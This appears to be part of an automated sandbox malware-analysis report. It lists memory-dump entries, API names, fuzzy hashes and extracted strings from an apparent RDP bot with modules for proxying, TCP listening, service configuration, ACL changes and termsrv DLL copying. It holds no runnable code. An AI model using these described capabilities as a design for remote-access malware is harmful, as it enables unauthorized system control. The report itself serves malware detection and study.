                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 1f0c8f6225a9bc618ddb07f2f1f3cda379d5d95a440c6c1aab50117772c59d0e
                                    • Instruction ID: 475b8dd9ca4eea4fb7d7a92d684a8f79266479d9ee2263c5debf935799178bda
                                    • Opcode Fuzzy Hash: 1f0c8f6225a9bc618ddb07f2f1f3cda379d5d95a440c6c1aab50117772c59d0e
                                    • Instruction Fuzzy Hash: 4DF0F6A260978A41E5938F20FC4037D2244EF46794F4C0276DE5D5A6D0DF2DD9868300
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    • Opcode ID: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
                                    • Instruction ID: 2954f0cd99f0df1e29c6cf6bf39199f9b57c702e5a2dd229f9c2cac09531d1ed
                                    • Opcode Fuzzy Hash: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
                                    • Instruction Fuzzy Hash: 2D311AE0B1C68282FB329739EC462382261AF53370F140331D47EC66F5DEADAD459242
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    • Opcode ID: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
                                    • Instruction ID: ac53808614f6dc590153e548b8e80a9a375a146ebaf2f82819911747302a03bf
                                    • Opcode Fuzzy Hash: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
                                    • Instruction Fuzzy Hash: 9A3139A0F0C68282FA325735ED882382251AF5A770F540B31D47EC6BF5EEECAD449251
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    • Opcode ID: f41a2fd7c2c62fd8492a237bcc7c73a49ed62abef21106d16d4f36e0309278c3
                                    • Instruction ID: 5364222bb01461268395c21539f7cfe79a93511db0809cbffa436e6f3161f93d
                                    • Opcode Fuzzy Hash: f41a2fd7c2c62fd8492a237bcc7c73a49ed62abef21106d16d4f36e0309278c3
                                    • Instruction Fuzzy Hash: 3C311AACE48A9282EA229F34ECCC33C2291AF40370F1807B1D4FD666E5EE2DE6455750
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    • Opcode ID: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
                                    • Instruction ID: 9ee4f3882837b835bee840669d3df1e8f600ba48a5e8f3e126f44560cc7cca94
                                    • Opcode Fuzzy Hash: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
                                    • Instruction Fuzzy Hash: F0310CE0E0C68282FA269B74EC853782691AF46334F100331E47DCAAF5DEACEF495640
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Sleepmemcpy
                                    • String ID:
                                    • API String ID: 1125407320-0
                                    • Opcode ID: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
                                    • Instruction ID: ff42dcda62c749cd7752a122f53c8e0e09f1b373f339680c7cd33faf6b14174b
                                    • Opcode Fuzzy Hash: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
                                    • Instruction Fuzzy Hash: 1F3119A4F1CACA82F7369735EC8427D2261AF43730F1803F2D47D666E5DE2DA5869B40
                                    APIs
                                      • Part of subcall function 00007FF7AABD1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7AABD162F), ref: 00007FF7AABD1FEE
                                    • SleepEx.KERNEL32 ref: 00007FF7AABD1A51
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: HandleModuleSleep
                                    • String ID:
                                    • API String ID: 1071907932-0
                                    • Opcode ID: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
                                    • Instruction ID: eb076d6ccf5acd9648038bb1445a70eeca655b4d8f8f2706f941ee1cf220f61c
                                    • Opcode Fuzzy Hash: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
                                    • Instruction Fuzzy Hash: E501F42271F683CAF7A03654F4503B9A295EB84344FD610B0E61E4B2F5DE7CD8478720
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: ServiceStatus
                                    • String ID:
                                    • API String ID: 3969395364-0
                                    • Opcode ID: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
                                    • Instruction ID: 1a541f575552d3bd740961764df33fada270669af90206c52e7f317d69951240
                                    • Opcode Fuzzy Hash: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
                                    • Instruction Fuzzy Hash: A3D06774D1F702C5F714BF25E855224A6A4BF59741BD290B5C10C43230CE2C6A568724
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: rand_s
                                    • String ID:
                                    • API String ID: 863162693-0
                                    • Opcode ID: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
                                    • Instruction ID: 1e3a324b2d1dc68fdcb5ad0cdf7800268f559a5aee761f5dad0dcfbe81ebaee3
                                    • Opcode Fuzzy Hash: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
                                    • Instruction Fuzzy Hash: 8DC00226A19540CAD620AB24E845359A770E798308FD08151E65D82664CA3CD61BCF14
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: CriticalEnterSection
                                    • String ID:
                                    • API String ID: 1904992153-0
                                    • Opcode ID: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
                                    • Instruction ID: 7cd476dc2202ffc1d31cbccbb43580796912c0c7502219e70b0d69e7603edf30
                                    • Opcode Fuzzy Hash: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
                                    • Instruction Fuzzy Hash: 85C08CE1F1D1A282FB0A6B71FC810780221AFAD300F001034E84EC2372EEEC6CD88A00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                    • API String ID: 4253334766-1535167640
                                    • Opcode ID: 6363c55dd3b19cd157e70e6c0aa18bdd31b4f9f527645224db46f4a492e8ace5
                                    • Instruction ID: 5ec7c99417e8d7e8710243d92bcaf6c628c4e12880d2dd578bb6889ec44024b9
                                    • Opcode Fuzzy Hash: 6363c55dd3b19cd157e70e6c0aa18bdd31b4f9f527645224db46f4a492e8ace5
                                    • Instruction Fuzzy Hash: 4B6117E1F0C5D785FA225B74EC403B863A0AB0275AF544132D96ECA2F5DEECAD44C356
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                    • API String ID: 3590747132-3524496754
                                    • Opcode ID: 338ea743c6ab41b1da8d1801cff54c7305943f91944127bfa0d9e4ce2e40490a
                                    • Instruction ID: cb3d800ca523b9597f8f52c2ad19718a64ececa04d6538c38b899037b65eb6f4
                                    • Opcode Fuzzy Hash: 338ea743c6ab41b1da8d1801cff54c7305943f91944127bfa0d9e4ce2e40490a
                                    • Instruction Fuzzy Hash: 643179E2A1C68246FB229B35EC011A97660AF467B4F041339ED7EC66F0DFACED458701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$strcpy$Local$CriticalErrorFreeLastSection$AllocCopyCreateEnterEntriesFileHandleInfoKnownLeaveModuleNamedSecurityWellfflushfwritestrcat
                                    • String ID: %ProgramFiles%\RDP\$%SystemRoot%\system32\rfxvmt.dll$(uniq_name != NULL)$C:/Projects/rdp/bot/rpd-controller/rdp.c$D$NULL$SetNamedSecurityInfoA done$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateWellKnownSid failed(t=%d,gle=%lu)$[E] (%s) -> Failed(uniq_name=%s,err=%08x)$[E] (%s) -> GetNamedSecurityInfoA failed(dst_dir=%s,res=%lu)$[E] (%s) -> LocalAlloc failed(s=%lu,gle=%lu)$[E] (%s) -> SetEntriesInAclA failed(res=%lu)$[E] (%s) -> SetNamedSecurityInfoA failed(res=%lu)$[I] (%s) -> %s$[I] (%s) -> Done(t=%d,_s=%lu)$[I] (%s) -> Done(uniq_name=%s)$dll$fileset_copy$fs_module_dir$rfxvmt.d$sid_get_well_known_one$termsrv3$v32.dll$v32.ini
                                    • API String ID: 439637577-3231512019
                                    • Opcode ID: ff588f9bc4b9baede6fef66bb8c23f0fb46566bbe07c60028de652eb7cf83905
                                    • Instruction ID: 2d616f26f2b286972e2cf6f6508465ede1958131a045a460671be21765379358
                                    • Opcode Fuzzy Hash: ff588f9bc4b9baede6fef66bb8c23f0fb46566bbe07c60028de652eb7cf83905
                                    • Instruction Fuzzy Hash: 4D127FA1B0C7C381FB229B20EC907B96260EB46784F544036DA4DCB6B6DEEDED45C746
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                    • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                    • API String ID: 2460052984-4087913290
                                    • Opcode ID: 74b26ad425fb8a5fddc439913b45df4c9c4e5cde0be30a875cf60db12acbeb68
                                    • Instruction ID: 4110c97e6b2bd1122828a70e3a5e4fc8503131a6e5bbf0f9e465e75004620798
                                    • Opcode Fuzzy Hash: 74b26ad425fb8a5fddc439913b45df4c9c4e5cde0be30a875cf60db12acbeb68
                                    • Instruction Fuzzy Hash: 08A15CA1B0C6C295FB229B35EC543FA63A1AB92744F540432C94DC66B5EEFCED45C702
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$AllocCreateEnterErrorLastLeaveProcessThread
                                    • String ID: (handler != NULL)$(host != 0)$(id != 0)$(port != 0)$C:/Projects/rdp/bot/rpd-controller/proxy.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateThread(routine_proxy) failed(gle=%lu)$[E] (%s) -> Failed(id=%llx,host=%08x,port=%d,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> CreateThread(%s) done$[I] (%s) -> Done(id=%llx,host=%08x,port=%d)$[W] (%s) -> Proxy is already open(id=%llx)$mem_alloc$proxy_open$routine_proxy
                                    • API String ID: 2213424947-2249309816
                                    • Opcode ID: c7e2cab6de9d794514e1bafba1a18b1a8457840a8e3fd79e8e7f7442e15e0e41
                                    • Instruction ID: cf89533483122895b8605eb2ac9e6272676db3d7237c67a31bac6c2f3463cbd8
                                    • Opcode Fuzzy Hash: c7e2cab6de9d794514e1bafba1a18b1a8457840a8e3fd79e8e7f7442e15e0e41
                                    • Instruction Fuzzy Hash: 9B9129E2A1D683C1FB228B24EC906B832A1AF46754F55013AD95DC72B4DFBDED85D302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Service$ErrorLast$ChangeCloseConfigHandleOpenfflushfwrite
                                    • String ID: $ $((mode == SERVICE_AUTO_START) || (mode == SERVICE_DEMAND_START) || (mode == SERVICE_DISABLED))$(svc != NULL)$C:/Projects/rdp/bot/codebase/scm.c$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ChangeServiceConfigA failed(lpServiceName=%s,mode=%lu,gle=%lu)$[E] (%s) -> OpenServiceA(SERVICE_CHANGE_CONFIG) failed(lpServiceName=%s,gle=%lu)$[I] (%s) -> Done(lpServiceName=%s,mode=%lu)$scm_config_start$~$~
                                    • API String ID: 4203309519-312684847
                                    • Opcode ID: bada9a83655d280baa5dd358c94eebb15ce8fc87529c221177d16a370ecaa4d2
                                    • Instruction ID: 86b35e42c0364c6bc3a9061ef979b7acee39253079ea9763873016c3e348a6af
                                    • Opcode Fuzzy Hash: bada9a83655d280baa5dd358c94eebb15ce8fc87529c221177d16a370ecaa4d2
                                    • Instruction Fuzzy Hash: 398107E1B1C68792FA224B35EC803F86260AF06754F104036C64ECA6F5DEFDAD84C752
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                    • API String ID: 1104438493-1059260517
                                    • Opcode ID: ea3e2038dfba584b526c33a7afe8fe4e3870c128d06ae37da3a39a9cd7f903c4
                                    • Instruction ID: d248aed5028ffd6345266c8c2a22951979ae9b75652349464a0b39f276e0ef3c
                                    • Opcode Fuzzy Hash: ea3e2038dfba584b526c33a7afe8fe4e3870c128d06ae37da3a39a9cd7f903c4
                                    • Instruction Fuzzy Hash: 3F714CE1F1CAC285FB225B36EC803B96751AB47744F540032DA5EC66B6DEACED45C302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseEnumOpen
